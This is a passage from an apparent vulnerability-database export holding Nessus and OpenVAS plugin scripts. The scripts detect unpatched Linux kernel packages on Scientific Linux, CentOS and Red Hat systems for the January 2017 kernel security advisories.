GRO problem and\n the corruption of IPoIB address information. As a\n result, the performance of IPoIB has been improved.\n\n - Previously, when a virtual machine (VM) with\n PCI-Passthrough interfaces was recreated, a race\n condition between the eventfd daemon and the virqfd\n daemon occurred. Consequently, the operating system\n rebooted. This update fixes the race condition. As a\n result, the operating system no longer reboots in the\n described situation.\n\n - Previously, a packet loss occurred when the team driver\n in round-robin mode was sending a large number of\n packets. This update fixes counting of the packets in\n the round-robin runner of the team driver, and the\n packet loss no longer occurs in the described situation.\n\n - Previously, the virtual network devices contained in the\n deleted namespace could be deleted in any order. If the\n loopback device was not deleted as the last item, other\n netns devices, such as vxlan devices, could end up with\n dangling references to the loopback device.\n Consequently, deleting a network namespace (netns)\n occasionally ended by a kernel oops. With this update,\n the underlying source code has been fixed to ensure the\n correct order when deleting the virtual network devices\n on netns deletion. As a result, the kernel oops no\n longer occurs under the described circumstances.\n\n - Previously, a Kabylake system with a Sunrise Point\n Platform Controller Hub (PCH) with a PCI device ID of\n 0xA149 showed the following warning messages during the\n boot :\n\n'Unknown Intel PCH (0xa149) detected.' 'Warning: Intel Kabylake\nprocessor with unknown PCH - this hardware has not undergone testing\n...'\n\nThe messages were shown because this PCH was not properly recognized.\nWith this update, the problem has been fixed, and the operating system\nnow boots without displaying the warning messages.\n\n - Previously, the operating system occasionally became\n unresponsive after a long run. This was caused by a race\n condition between the try_to_wake_up() function and a\n woken up task in the core scheduler. With this update,\n the race condition has been fixed, and the operating\n system no longer locks up in the described scenario.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1701&L=scientific-linux-errata&F=&S=&P=9762\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c9770c7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.6.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-01T23:41:53", "references": ["2017:0036", "http://lists.centos.org/pipermail/centos-announce/2017-January/022206.html"], "pluginID": "1361412562310882629", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-01-13T00:00:00", "title": "CentOS Update for kernel CESA-2017:0036 centos6 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310882629", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882629", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2017:0036 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882629\");\n script_version(\"$Revision: 6659 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:52:22 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-13 05:42:33 +0100 (Fri, 13 Jan 2017)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2017:0036 centos6 \");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux \nkernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap\ndisclosure, or further impact was found in setsockopt(). The function call\nis normally restricted to root, however some processes with cap_sys_admin\nmay also be able to trigger this flaw in privileged container environments.\n(CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\nBug Fix(es):\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a code\npath of a client that returns the file layout. As a result, the kernel no\nlonger crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash\non a Nonmaskable Interrupt (NMI) that was injected from the host, this VM\nbecame unresponsive and did not create the vmcore dump file. This update\napplies a set of patches to the Virtual Machine Bus kernel driver\n(hv_vmbus) that fix this bug. As a result, the VM now first creates and\nsaves the vmcore dump file and then reboots. (BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the DST_NOCOUNT\nmechanism, and the IPv6 routing cache now shows correct values.\n(BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet\n(FCoE) stack, suboptimal performance in some cases occurred on systems with\na large number of CPUs. This update fixes the fc_exch_alloc() function to\ntry all the available exchange managers in the list for an available\nexchange ID. This change avoids failing allocations, which previously led\nto the host busy status. (BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution\nautomatically. Consequently, users were not able to change the resolution\nby manual setting of the kernel's 'vga=' parameter in the\n/boot/grub/grub.conf file. This update adds the 'nomodeset' parameter,\nwhich can be set in the /boot/gr ... \n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"kernel on CentOS 6\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"CESA\", value: \"2017:0036\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2017-January/022206.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~2.6.32~642.13.1.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:41:11", "references": ["http://lists.centos.org/pipermail/centos-announce/2017-January/022246.html", "2017:0086"], "pluginID": "1361412562310882638", "description": "Check the version of kernel", "edition": 4, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-01-20T00:00:00", "title": "CentOS Update for kernel CESA-2017:0086 centos7 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310882638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882638", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2017:0086 centos7 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882638\");\n script_version(\"$Revision: 6659 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:52:22 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-20 05:39:39 +0100 (Fri, 20 Jan 2017)\");\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-7117\", \"CVE-2016-9555\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2017:0086 centos7 \");\n script_tag(name: \"summary\", value: \"Check the version of kernel\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The kernel packages contain the Linux kernel, \nthe core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous\nbug fixes, some of which you can see below. Space precludes documenting all\nof these bug fixes in this advisory. To see the complete list of bug fixes,\nusers are directed to the related Knowledge Article:\n'https://access.redhat.com/articles/2857831'.\n\nSecurity Fix(es):\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP\nprotocol. A remote attacker could trigger an out-of-bounds read with an\noffset of up to 64kB potentially causing the system to crash.\n(CVE-2016-9555, Moderate)\n\nBug Fix(es):\n\n* Previously, the performance of Internet Protocol over InfiniBand (IPoIB)\nwas suboptimal due to a conflict of IPoIB with the Generic Receive Offload\n(GRO) infrastructure. With this update, the data cached by the IPoIB driver\nhas been moved from a control block into the IPoIB hard header, thus\navoiding the GRO problem and the corruption of IPoIB address information.\nAs a result, the performance of IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough interfaces\nwas recreated, a race condition between the eventfd daemon and the virqfd\ndaemon occurred. Consequently, the operating system rebooted. This update\nfixes the race condition. As a result, the operating system no longer\nreboots in the described situation. (BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in round-robin\nmode was sending a large number of packets. This update fixes counting of\nthe packets in the round-robin runner of the team driver, and the packet\nloss no longer occurs in the described situation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted\nnamespace could be deleted in any order. If the loopback device was not\ndeleted as the last item, other netns devices, such as vxlan devices, could\nend up with dangling references to the loop ... \n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"kernel on CentOS 7\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"CESA\", value: \"2017:0086\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2017-January/022246.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.6.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T12:56:59", "references": ["https://www.redhat.com/archives/rhsa-announce/2017-January/msg00021.html", "https://access.redhat.com/articles/2857831", "2017:0086-01"], "pluginID": "1361412562310871747", "description": "The remote host is missing an update for the ", "edition": 6, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-01-18T00:00:00", "title": "RedHat Update for kernel RHSA-2017:0086-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871747", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2017:0086-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871747\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-18 05:45:51 +0100 (Wed, 18 Jan 2017)\");\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-7117\", \"CVE-2016-9555\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for kernel RHSA-2017:0086-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous\nbug fixes, some of which you can see below. Space precludes documenting all\nof these bug fixes in this advisory. To see the complete list of bug fixes,\nusers are directed to the related Knowledge Article.\n\nSecurity Fix(es):\n\n * A use-after-free vulnerability was found in the kernel's socket recvmmsg\nsubsystem. This may allow remote attackers to corrupt memory and may allow\nexecution of arbitrary code. This corruption takes place during the error\nhandling routines within __sys_recvmmsg() function. (CVE-2016-7117,\nImportant)\n\n * A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and\nother tcp_* functions. This condition could allow an attacker to send an\nincorrect selective acknowledgment to existing connections, possibly\nresetting a connection. (CVE-2016-6828, Moderate)\n\n * A flaw was found in the Linux kernel's implementation of the SCTP\nprotocol. A remote attacker could trigger an out-of-bounds read with an\noffset of up to 64kB potentially causing the system to crash.\n(CVE-2016-9555, Moderate)\n\nBug Fix(es):\n\n * Previously, the performance of Internet Protocol over InfiniBand (IPoIB)\nwas suboptimal due to a conflict of IPoIB with the Generic Receive Offload\n(GRO) infrastructure. With this update, the data cached by the IPoIB driver\nhas been moved from a control block into the IPoIB hard header, thus\navoiding the GRO problem and the corruption of IPoIB address information.\nAs a result, the performance of IPoIB has been improved. (BZ#1390668)\n\n * Previously, when a virtual machine (VM) with PCI-Passthrough interfaces\nwas recreated, a race condition between the eventfd daemon and the virqfd\ndaemon occurred. Consequently, the operating system rebooted. This update\nfixes the race condition. As a result, the operating system no longer\nreboots in the described situation. (BZ#1391611)\n\n * Previously, a packet loss occurred when the team driver in round-robin\nmode was sending a large number of packets. This update fixes counting of\nthe packets in the round-robin runner of the team driver, and the packet\nloss no longer occurs in the described situation. (BZ#1392023)\n\n * Previously, the virtual network devices contained in the deleted\nnamespace could be deleted in any order. If the loopback device was not\ndeleted as the last item, other netns devices, such as vxlan devices, could\nend up with ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"kernel on\n Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0086-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-January/msg00021.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/2857831\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.10.0~514.6.1.el7\", rls:\"RHENT_7\")) != 